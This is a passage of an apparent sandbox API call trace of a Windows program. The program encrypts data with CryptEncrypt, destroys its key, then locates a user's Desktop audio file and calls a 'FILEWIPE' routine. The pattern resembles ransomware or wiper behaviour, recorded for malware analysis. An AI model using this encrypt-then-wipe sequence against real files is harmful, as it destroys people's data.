(in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.394] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.394] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a6af8*, pdwDataLen=0x61e2d8*=0x8577, dwBufLen=0x8580 | out: pbData=0x7a6af8*, pdwDataLen=0x61e2d8*=0x8580) returned 1 [0076.395] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.395] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.395] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.397] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.397] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.397] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.397] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.397] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.397] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.397] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.397] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.398] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.398] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.398] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.398] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.398] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.398] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.404] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.404] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.404] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.407] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.407] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.407] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.407] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.408] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.408] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0076.408] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.408] CryptDestroyKey (hKey=0x6b8af8) returned 1 [0076.408] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.408] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.408] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.408] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.408] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0076.408] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.408] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.408] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.408] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.409] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.409] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0076.409] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.409] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.409] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0076.409] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.409] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.409] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.409] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.409] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.409] CryptReleaseContext (hProv=0x6969c0, dwFlags=0x0) returned 1 [0076.409] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.409] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.409] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0076.409] FreeLibrary (hLibModule=0x77710000) returned 1 [0076.409] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.409] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.409] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.411] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.412] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.412] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0076.412] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0076.412] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.412] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.413] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7TIqi.m4a", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x361d4d90, ftCreationTime.dwHighDateTime=0x1d5da95, ftLastAccessTime.dwLowDateTime=0x9aa79520, ftLastAccessTime.dwHighDateTime=0x1d5da15, ftLastWriteTime.dwLowDateTime=0x9aa79520, ftLastWriteTime.dwHighDateTime=0x1d5da15, nFileSizeHigh=0x0, nFileSizeLow=0x8577, dwReserved0=0x0, dwReserved1=0x657690, cFileName="7TIqi.m4a", cAlternateFileName="")) returned 0x6b89f8 [0076.413] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0076.413] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.413] CharLowerBuffW (in: lpsz="byte[34167]", cchLength=0xb | out: lpsz="byte[34167]") returned 0xb [0076.413] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.413] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0076.413] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.413] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0076.413] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0076.413] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0076.413] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0076.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb438 [0076.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb438, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0076.414] FreeLibrary (hLibModule=0x76f90000) returned 1 [0076.414] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6aa0a0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0076.414] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0076.414] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6906b0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0076.414] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0076.414] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0076.414] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.414] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.415] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.415] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.416] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.416] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.416] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.416] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.416] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.416] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.416] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.416] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.416] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.416] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.417] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0f0 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df28 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db08 | out: hHeap=0x650000) returned 1 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.417] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0076.417] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0076.417] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb378 [0076.417] 